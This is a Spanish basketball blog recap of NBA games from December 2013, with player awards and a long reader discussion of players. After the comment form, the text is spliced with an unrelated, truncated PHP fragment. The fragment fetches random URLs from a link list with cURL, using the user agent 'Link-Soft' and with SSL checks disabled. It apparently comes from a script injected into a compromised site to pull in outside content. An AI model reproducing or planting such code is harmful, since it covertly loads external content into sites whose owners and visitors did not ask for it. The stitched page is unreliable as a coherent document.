La crónica: Portland va en serio

05 de December de 2013 por Simon

Jornada de miércoles más reducida de lo acostumbrado. 8 partidos programados que se convirtieron en 7 debido la suspensión del San Antonio Spurs – Minnesota Timberwolves que se iba a jugar en México debido a un fallo en la ventilación del pabellón que lo llenó de humo. En cuanto a los partidos que sí se pudieron disputar lo más destacado fue el segundo tropezón seguido para Houston, esta vez en casa ante Suns, la victoria de Indiana en Utah y la confirmación, por si alguien no lo tenía claro, de que estos Blazers han llegado para quedarse.

El gran duelo de la jornada enfrentaba a dos de los grandes gallos del Oeste. Los Oklahoma City Thunder visitaban el Moda Center para calibrar el verdadero poder de estos sorprendentes Blazers. Tras ser dominados en la primera mitad, los Blazers recuperaron el control del partido con un gran tercer cuarto liderados por el mejor Aldridge de la temporada. Ya en el último cuarto las alternancias en el marcador fueron una constante. A falta de 30 segundos y uno abajo para los Thunder, Durant tuvo un despiste imperdonable y sin darse cuenta siquiera dejó escapar a Nico Batum que completamente sólo encestó el triple que dio el golpe de gracia al partido (104-111). Victoria importantísima de los Blazers por tratarse de un rival directo y aviso lanzado al resto de la liga tras ganar en apenas 3 días a dos de los mejores equipos de la competición, manteniéndose firmes en la cabeza del Oeste. Sin embargo, el líder de la liga siguen siendo los Indiana Pacers que se recuperó de la derrota sufrida en Oregon hace un par de días con una victoria trabajada en Sal Lake City ante unos Jazz que desde que ha debutado Trey Burke parecen otros. En la primera parte Utah marcó el ritmo del partido pero en la segunda fue Indiana la que poco a poco subió el nivel de exigencia y con un parcial de 9-0 a mitad del último cuarto certificó la victoria (95-86). 

Como hemos comentado en la introducción, Houston sumó su segundo tropezón consecutivo tras caer ayer en casa ante los Phoenix Suns. Ayer no era el día de los jugadores de los Rockets como demuestra el 35% de acierto global del equipo y el 7 de 28 en tiros de campo con que acabó el partido la pareja Harden&Howard. Gracias a la aportación desde el banquillo de Aaron Brooks y Omri Casspi los Rockets mantuvieron sus opciones de llevarse el partido hasta mediados del último cuarto en el que un parcial de 13-0 coronado por un triple de Dragic y otro de Bledsoe otorgó la ventaja definitiva a los Suns (97-88). El otro duelo de la jornada entre aspirantes a Play Off en el Oeste al final de temporada entre Dallas Mavericks y New Orleans Pelicans terminó cayendo de lado de los de Mark Cuban en un partido en el que los Pelicans dominaron tanto el rebote como cuidaron mal el balón. El partido, igualadísimo en todas sus fases, entró con empate a 97 en el último minuto y medio en el que los tiros libres de Dirk Nowitzki terminaron decidiendo el partido (100-97).

En el resto de partidos de la jornada, los Cavs sorprendieron a los Denver Nuggets (88-98) gracias a su dominio en el rebote. Tristan Thompson consiguió un récord personal con 21 rebotes, 9 ofensivos, mientras que Anderson Varejao desde el banco dio por primera vez la impresión de parecerse al del año pasado, con 13 rebotes y 18 puntos. Los Clippers también fueron derrotados por un equipo del este, los Atlanta Hawks, que contaron con el retorno de Kyle Korver como mejor arma (97-107). El alero anotó 6 triples en 9 intentos para empatar el récord de partidos consecutivos anotando al menos un triple con 89. Para terminar el resumen de la jornada, los Pistons continuaron con su racha triunfal en Milwaukee y lo hicieron con una nueva exhibición brutal de Andre Drummond que atrapó 19 rebotes y anotó 24 puntos. Por si fuera poco su compañero en la pintura, Monroe, atrapó 17 rebotes. Absolutamente brutal (105-98).

PREMIOS

MVP: EXHIBICIÓN con mayúsculas de Lamarcus Aldridge. 38 puntos con un 17 de 28 en tiros de campo, 13 rebotes, 5 asistencias, 2 robos y una templanza brutal en los últimos minutos en los que anotó canastas muy importantes. El mejor ala-pívot del momento.

Rookie: Giannis Antetokounmpo es casi la única luz en la terrible temporada de los Bucks. El jugador griego gana importancia partido a partido y deja destellos de jugador hiper completo. Ayer acabó con 6 puntos, 6, rebotes, 4 asistencias y 3 tapones.

Sorpresa: Y apareció Al-Farouq Aminu de la nada y se fue a los 16 puntos, 3 robos y ¡21 rebotes! Tristan Thompson también se fue a los 21 rebotes frente los Nuggets.

Decepción: James Harden anotó sólo 3 de sus 17 lanzamientos a canastas y además perdió 5 balones. Ty Lawson tampoco vivió su mejor día de cara a canasta tras fallar 10 de 11 tiros. Al menos repartió 11 asistencias.

Esfuerzo en vano: Jrue Holiday parece haber encontrado el punto tras un inicio de temporada titubeante. El de los Pelicans acabó el partido con 26 puntos, 9 asistencias y 4 rebotes pero el partido cayó del lado de los Mavs.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. txusma dice:
    #1

    Me reafirmo en lo dicho: Los Clippers echarán de menos a JJ Redick. Reggie Bullock ahora mismo no está preparado para asumir ese papel. Le costará.
    Y brutal el rendimiento de los Blazers per la plantilla parece algo corta. No sé si aguantarán hasta el final.

      Citar

  2. Simon dice:
    #2

    txusma:
    Me reafirmo en lo dicho: Los Clippers echarán de menos a JJ Redick. Reggie Bullock ahora mismo no está preparado para asumir ese papel. Le costará.
    Y brutal el rendimiento de los Blazers per la plantilla parece algo corta. No sé si aguantarán hasta el final.

    Totalmente de acuerdo… de hecho lo iba a mencionar en la crónica, que echaron mucho de menos las soluciones que aporta JJ Redick pero al final en la revisión lo quité… La verdad es que es de los hombres mas subvalorados de la liga…

      Citar

  3. Ruxixón dice:
    #3

    El equipo de MODA,vaya tela con los Blazers,buen equipo,gran ambiente en los partidos de local…yo no creo que ganen la división pero en PO seguro que se meten.

    PD.la página me va un poco mal,no sé si alguien más le pasa lo mismo o soy yo :S

      Citar

  4. HisRoyalAirness dice:
    #4

    Muy buen análisis Simon pero, sinceramente, creo que Aldridge no es el mejor ala-pivot ni empapado en crack.

    Por otra parte estoy con Txus, es una grata sorpresa lo de Portland pero creo que van a desinflarse y lo van a acabar pasando mal

      Citar

  5. Denise dice:
    #5

    txusma:
    Me reafirmo en lo dicho: Los Clippers echarán de menos a JJ Redick. Reggie Bullock ahora mismo no está preparado para asumir ese papel. Le costará.
    Y brutal el rendimiento de los Blazers per la plantilla parece algo corta. No sé si aguantarán hasta el final.

    Lo echarán de menos porque es un buen jugador pero les va a venir bien porque tios como Collison y Bullock jugaran mas minutos y por tanto se involucraran mas en el equipo. Paciencia con Bullock, solo es un rookie.

    En los Bucks habría que mencionar tammbien al rookie Wolters que lo está haciendo francamente bien. Neal, tras años jugando en contenders en la NBA y en Europa, ahí está desmotivado, y Knight me parece una calamidad de jugador, una version mala de Jennings, que al menos este nos regala partidos de 40 puntos de vez en cuando. Seguimos con Mayo, Pachulia, bffff..da igual que se lleven al pick 1, no tienen mucho que hacer, estan llenos de contratos basura.

    Decir que Howard es el mejor center de la liga ya no tiene sentido estando por ahí Drummond. Cada vez creo menos en el proyecto de los Rockets con el duo Harden-Howard y lo digo un día en el que DH se ha cascado uno de los mejores partidos de la temporada con 15-18. Harden es muy bueno, un jugón, potencialmente el mejor SG de la liga, pero mentalmente creo que es una persona aun bastante inmadura y eso le resta mucho a su juego. Me da la sensación de que si no consigue motivarse en un equipo, ciudad y en proyectos ganadores acabará siendo un Gilbert Arenas 2.0.

    Gran temporada de Blazers a pesar del flojo rendimiento de gente como Wright, Thomas Robinson y la lesión de McCollum. Robin Lopez se está destapando como un center muy util.

      Citar

  6. Denise dice:
    #6

    Ah, se me olvidó el jugador mas sobrevalorado de la liga, Sefolosha, no se que le ven a este jugador para estar tan bien considerado por la prensa, el entrenador. Me parece una castaña para tenerlo de titular año tras año y ser a veces el que mas juega de los Thunder. En teoría es un gran defensor, yo pienso que su defensa es muy normalita, tremendamente sobrevalorada, si a cualquier otro negro fuertote le das ese rol de defender a muerte y en ataque quedarte en la esquina tomando aire porque Durant y RW van a resolver la jugada, creo que cualquiera haría su trabajo igual o mejor,

      Citar

  7. Ruxixón dice:
    #7

      Citar

  8. Simon dice:
    #8

    HisRoyalAirness:
    Muy buen análisis Simon pero, sinceramente, creo que Aldridge no es el mejor ala-pivot ni empapado en crack.

    Pues sinceramente, y esto es algo muy subjetivo y opinable siempre, creo que hoy en día no hay ningún ala-pivot que se acerque a su rendimiento global, a día de hoy nadie está a su altura en su posición.

    De los ala-pivots consagrados, jóvenes y en la cumbre de su carrera tenemos a Love, Griffin, Anthony Davis y él.

    En ataque sólo Love es más completo que él, pero tampoco tanto y defensivamente no hay color sin ser Aldridge una maravilla. Además Aldridge es más líder que Love todos los días que salga el sol.
    En defensa Davis es mucho mejor… pero en ataque no hay color. Probablemente en dos años A. Davis sea el mejor pero a día de hoy por juventud y experiencia… no.
    Griffin, y no quiero destapar de nuevo el debate con él, creo que es peor jugador que Aldridge se mire por donde se mire.

    Luego está el grupo de dominadores de la última década pero que ya pasaron sus mejores años aunque algunos aún estén a un nivel extraordinario pero que andan por debajo del cuarteto nombrado anteriormente incluso algunos hoy en día son más 5 que 4. Duncan, Nowitzki, Gasol, Garnett e incluso Bosh me cabrian en este grupo.

    Por lo demás no veo ningún ala-pívot que ni se acerque a los ya nombrados.
    Supongo que los tiros iban a considerar a Love el mejor ala-pívot de la liga. Aquí ya digo que puede entrar el tema de la subjetividad y las fobias y filias personales. Excursar la defensa de Love en que bastante hace con su físico y decir que es increible que con esa mierda de físico sea capaz de hacer esos números… pero esas cosas a mi no me valen para decir que es el mejor pues el físico es una cualidad más para jugar a esto, igual que la visión de juego, la capacidad de tiro o el tan mentado IQ .
    ¿quien aporta más a dia de hoy en una cancha de baloncesto? ¿quién lleva a su equipo a más victorias?
    Yo creo que a día de hoy no hay nadie por encima del amigo Lamarcus, a nada que el equipo ha acompañado mira donde lo tiene.

      Citar

  9. Txusma dice:
    #9

    Durante el puente intentaré mirarme el tema d la web pq es verdad q se cae demasiado y no será por las visitas!

    Y el comentario de Lamarcus es mio. Love mola mucho, me encanta, pero su defensa es un chiste y si comparo la plantilla de wolves y blazers hombre por hombre me parece mejor la d minnesota. Q es lo q falla?

      Citar

  10. Denise dice:
    #10

    Aun pareciendome Aldridge un grandisimo jugador, yo me quedaría con Love.
    Obviamente Lamarcus es la piedra angular de los Blazers, pero si estan ahí arriba no es solo por él, juega al lado de un tal Lillard que para mi es el 4º mejor base de la liga por detrás de Paul, Parker y Westbrook. Batum es un jugadorazo a ambos lados, siempre me ha encantado y luego hay gente como Matthews y Lopez que estan jugando al 140% de su rendimiento habitual. Todo el 5 inicial mas Mo Williams lo está bordando.

    Que pena la lesión de Davis, para mi los Pelicans eran equipo de PO y ahora van a perder muchos juegos. Jason Smith está cuajando un temporadón y hace su buen trabajo sustituyéndole, pero la sombra es alargada y la rotación interior cortisima. Creo que deberían intentar traspasar a Tyreke por un interior, cubrirse las espaldas por si Smith no renueva, y de paso darle mas minutos a Brian Roberts y a Rivers que me parecen dos jugadores muy utiles y que les dan muy pocas oportunidades.

      Citar

  11. TheDeerHunter dice:
    #11

    Denise:
    Ah, se me olvidó el jugador mas sobrevalorado de la liga, Sefolosha, no se que le ven a este jugador para estar tan bien considerado por la prensa, el entrenador. Me parece una castaña para tenerlo de titular año tras año y ser a veces el que mas juega de los Thunder. En teoría es un gran defensor, yo pienso que su defensa es muy normalita, tremendamente sobrevalorada, si a cualquier otro negro fuertote le das ese rol de defender a muerte y en ataque quedarte en la esquina tomando aire porque Durant y RW van a resolver la jugada, creo que cualquiera haría su trabajo igual o mejor,

    Me intriga porqué lo calificas como el más sobrevalorado de la liga… ¿sólo es porque juega minutadas?
    Por mi parte le considero un superdefensor. Concretamente yo no he visto a nadie defender de una manera tan limpia y al mismo tiempo tan eficaz, hasta donde llegan las posibilidades humanas, a Kobe Bryant. Únicamente considero a Tony Allen por encima suyo como defensor de perímetro en el Oeste. Rápido, inteligente, brazos largos y buena colocación, con su dosis exacta de agresividad. Lo que me extraña es que alguien pueda poner en duda que lo sea. No se en qué te basas.

    Yo me baso en (sólo este curso):
    30 Octubre.- Gordon Hayward 12 ptos, 4 de 13;
    1 Noviembre.- Kevin Martin 9 ptos, 4 de 11;
    3 Nov.- Goran Dragic 10 ptos;
    6 Nov.- Monta Ellis 20 ptos, 8 de 17;
    8 Nov.- Chauncey Billups 3 ptos, 1 de 6;
    10 Nov.- (Le apunto fail frente a Bradley Beal.. 34 ptos)
    13 Nov.- J.J. Redick 15 ptos, 5 de 13;
    14 Nov.- Stephen Curry 22 ptos, 8 de 22;
    16 Nov.- O.J. Mayo 22 ptos, 7 de 19;
    18 Nov.- Randy Foye 11 ptos;
    21 Nov.- J.J. Redick 8 ptos, 3 de 11;
    24 Nov.- Gordon Hayward 5 ptos, 2 de 9;
    27 Nov.- Danny Green 4 ptos, 2 de 7;
    29 Nov.- (Fail frente a Stephen Curry.. 32 ptos)
    1 Diciembre.- Kevin Martin 24 ptos, 6 de 16;
    3 Dic.- Ben McLemore 14 ptos, 4 de 12;
    4 Dic.- Wesley Matthews 13 ptos, 4 de 12.

    Yo creo que en este caso, los números son perfectamente ilustrativos de porqué este hombre juega tanto, aunque luego la realidad a mí me parece mucho mejor. Admito que estaba llamado a ser el anti-Kobe de los Thunder y sin su presencia su valor baja un poco. De todas formas siempre están los Curry, Harden, etc con los que le tocará lidiar en playoffs seguro.

    En ataque sí es más limitado. Personalmente creo que es un jugador correcto, que las enchufa cuando le llegan en buena posición (que lógicamente es rara vez en ese equipo)

      Citar

  12. Denise dice:
    #12

    Sobrevalorado porque no me parece tan buen defensor como lo pintan, he visto muchos partidos suyos y el tio es inteligente pero tambien queda retratado muchas veces, a pesar de tener un rol cojonudo, en ataque no tiene ninguna presión, puede tomar todo el descanso que quiera para volver a defender bien en la siguiente posesión. Para nada me parece el mejor defensor perimetral, antes que él, a parte de Allen, meto a Kawhi Leonard , Afflalo, Iguodala, los Barnes tanto de Clippers como de Warriors, y ya a estrellas como George ó Lebron. El de los Spurs para mi es el mejor defensor exterior de toda la liga.
    Agradezco el esfuerzo que has hecho de buscar numeros pero no me dicen mucho, para empezar habría que ver en cuantas de esas jugadas ha sido Thabo el defensor, y en segundo lugar, de los nombres que me pones hay gente sobrevaloradisima como Hayward, Mayo, Foye, Billups (acabado), y luego gente como Redick, Matthews ó Danny Green normalmente sus lanzamientos son tiros abiertos sin defensor aprovechandose de las ventajas generadas por Paul/Crawford, Lillard ó Parker/Duncan/Manu, por lo que quien sea su defensor no puede hacer mucho mas ahí.

    No me malinterpreten, me parece un jugador necesario en una plantilla pero no para jugar tanto en detrimento de Jackson y de Lamb, y para estar tan bien reconocido por jugadores y prensa.

      Citar

  13. Denise dice:
    #13

    Denise:
    y para estar tan bien reconocido por jugadores y prensa.

    Por aficionados quería decir no por jugadores,

      Citar

  14. TheDeerHunter dice:
    #14

    Denise, yo no había hecho el ejercicio de revisar sus partidos pero sabía lo que me iba a encontrar. No sabía si iban a ser Haywards, Mayos o Foyers o cualquier otro nombre. No es casualidad, puedes mirarlo tú mismo en las anteriores campañas que el escolta rival suele quedarse ante él más cerca del 30% en tiro que del 50%. Luego lo que dices, habrá que ver que porcentaje de tiempo está sobre ese jugador, por supuesto, pero él se pone sobre el escolta rival. No Durant. De Oklahoma hemos visto muchos partidos los últimos años.

    Después, yo creo que no hay que hablar de que Sefolosha le quita minutos a Jackson. Sí a Lamb… pero también creo que es un acierto de Brooks cómo está llevando ambos casos. Ambos están entrando paulatinamente con acierto, pero estarás de acuerdo conmigo que a nivel ofensivo los Thunder no necesitan más artillería y es lo que ofrecerían ambos jugadores por encima de lo que ofrece Sefolosha. En términos defensivos aquí sí que no admito comparación.

    Por último, de los jugadores defensivos que has nombrado. Sí, admito que Kawhi Leonard es tan buen o mejor defensor (seguramente lo segundo) que Sefolosha. No sé porqué se me ha pasado, centraba el tiro en el Oeste… aunque mentalmente repasaba más escoltas que otra cosa. Harrison Barnes no me parece que esté a ese nivel al menos de momento… pero aunque lo estuviera tanto el de los Spurs como el de los Warriors son de un perfil muy superior y supongo que terminarán por otros derroteros. Algo similar pasa con Iguodala, cuyo físico es superior, pero es más efectista que eficaz en defensa y su rol es muy distinto. Matt Barnes ya no me parece comparable, si alguna vez lo fue.
    La mejor comparación que me has dado ha sido Afflalo aunque esté en el Oeste. Ahora también ha perdido su perfil de defensor (en buena lógica) pero cuando lo tuvo era muy similar a como veo a Sefolosha. Eso sí, con menor envergadura y ligeramente inferior a mis ojos, pero un excelente defensor y, como resalto del otro, muy limpio, eficaz e inteligente. No hace falta ser un cerdaco como Bruce Bowen para defender bien.

      Citar

  15. Denise dice:
    #15

    TheDeerHunter:
    Denise, yo no había hecho el ejercicio de revisar sus partidos pero sabía lo que me iba a encontrar. No sabía si iban a ser Haywards, Mayos o Foyers o cualquier otro nombre. No es casualidad, puedes mirarlo tú mismo en las anteriores campañas que el escolta rival suele quedarse ante él más cerca del 30% en tiro que del 50%. Luego lo que dices, habrá que ver que porcentaje de tiempo está sobre ese jugador, por supuesto, pero él se pone sobre el escolta rival. No Durant. De Oklahoma hemos visto muchos partidos los últimos años.

    Después, yo creo que no hay que hablar de que Sefolosha le quita minutos a Jackson. Sí a Lamb… pero también creo que es un acierto de Brooks cómo está llevando ambos casos. Ambos están entrando paulatinamente con acierto, pero estarás de acuerdo conmigo que a nivel ofensivo los Thunder no necesitan más artillería y es lo que ofrecerían ambos jugadores por encima de lo que ofrece Sefolosha. En términos defensivos aquí sí que no admito comparación.

    Por último, de los jugadores defensivos que has nombrado. Sí, admito que Kawhi Leonard es tan buen o mejor defensor (seguramente lo segundo) que Sefolosha. No sé porqué se me ha pasado, centraba el tiro en el Oeste… aunque mentalmente repasaba más escoltas que otra cosa. Harrison Barnes no me parece que esté a ese nivel al menos de momento… pero aunque lo estuviera tanto el de los Spurs como el de los Warriors son de un perfil muy superior y supongo que terminarán por otros derroteros. Algo similar pasa con Iguodala, cuyo físico es superior, pero es más efectista que eficaz en defensa y su rol es muy distinto. Matt Barnes ya no me parece comparable, si alguna vez lo fue.
    La mejor comparación que me has dado ha sido Afflalo aunque esté en el Oeste. Ahora también ha perdido su perfil de defensor (en buena lógica) pero cuando lo tuvo era muy similar a como veo a Sefolosha. Eso sí, con menor envergadura y ligeramente inferior a mis ojos, pero un excelente defensor y, como resalto del otro, muy limpio, eficaz e inteligente. No hace falta ser un cerdaco como Bruce Bowen para defender bien.

    Ya, yo no digo que sea malo, un tronco y le agradezco que no sea un cerdo como Bowen, pero a mi juicio tampoco lo veo tan bueno. ¿Te acuerdas de Ime Udoka? A mi me parecía un excelentisimo defensor que por H ó por B nunca tuvo la mas minima repercusión a nivel general, y Sefolosha es de ese corte pero al revés, siempre leo en webs, foros y demas elogios favorables en mi opinión desproporcionados.

    Respecto al parrafo 2, Durant y Westbrook son muy buenos y los Thunder por esa vía tienen artillería de sobra, pero un equipo debe tener mas soluciones y no centrar el ataque en 2 jugadores por muy buenos que estos sean, que al final queda un equipo previsible y con drogodependencia de KD y RW. Yo si le daría mas rol a Lamb y Jackson.
    Que manía le tienes a Matt Barnes jeje, en GSW era el gran defensor de aquellos del We Believe, en los Suns del run and gun era el unico que defendía, en los Magic se salió defensivamente, en Lakers fue de mas a menos como todo el equipo aquel año del 4-0 que le metió los Mavs y ahora con sus 30 años largo no es tan buen defensor pero si mucho mejor ofensivamente.

      Citar

  16. TheDeerHunter dice:
    #16

    Me acuerdo muy poco de Ime Udoka (¿era en Warriors donde estaba?) Entre otras cosas porque nunca le vi bailar con la más fea en circunstancias como sí le he visto a Sefolosha.

    Respecto a los de Lamb y Jackson estoy de acuerdo contigo, pero por ese lado no considero que los Thunder lo estén haciendo mal. Yo creo que en términos defensivos no es demasiado correcto discutirle cosas a Brooks, que en ese sentido es de lo mejorcito de la liga. Uno de sus pretorianos es Sefolosha, al que hemos visto que ha quitado cuando ha tenido que quitar.

    Respecto a Barnes te equivocas. No le tengo ninguna manía. Hay cosas que no me han gustado de él durante su carrera, pero siempre le he tenido respeto como jugador de rotación. Acuerdate que en su día consideraba a Orlando como la mejor plantilla de la liga estando él, aunque nunca le vi como un titular digno de un equipo campeón. La diferencia de sus mejores años con Sefolosha probablemente sólo sea el contexto (Durant y Westbrook) frente a las necesidades que había en Orlando. Eso sí, también le veo como alguien más “cerdete” que Sefolosha, pero sin alcanzar ciertos límites.

      Citar

  17. txusma dice:
    #17

    Ime Udoka donde destacó de verdad fue en los Spurs, no? Llegó justo detrás de Bowen creo recordar.

      Citar

  18. Denise dice:
    #18

    txusma:
    Ime Udoka donde destacó de verdad fue en los Spurs, no? Llegó justo detrás de Bowen creo recordar.

    En efecto, aunque antes de eso cuajó una excepcional campaña con los Blazers del amigo McMillan.
    Para mí era uno de los mejores especialistas defensivos que he visto nunca, el problema es que no sé por qué cuajó en la NBA a los 29 años y solo pudo tener 3-4 años de carrera.

      Citar

  19. Denise dice:
    #19

    Hala!, he buscado algo de Udoka en la red, y actualmente es uno de los asistentes de Popovych en los Spurs. Pues este Udoka tenía madera de poder convertirse en un entrenador serio. En ese aspecto, era una especie de Battier, asi serio, responsable y calladito.

      Citar

  20. TheDeerHunter dice:
    #20

    A los Blazers de McMillan no los veía a menudo. ¿Mea culpa?

      Citar

  21. Jose Luis dice:
    #21

    Lo único que recuerdo yo de Udoka es, estando en los Kings, fallar dos tiros libres en un partido Navideño (no sé si el mismo 25 o por esas fechas) ante los Lakers en los últimos 3 segundos y que Bryant se marcase el buzzer beater desde la esquinita con Sergio Rodríguez “defendiéndole”

    http://www.youtube.com/results?search_query=ime+udoka+free+throws+against+lakers&sm=3

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>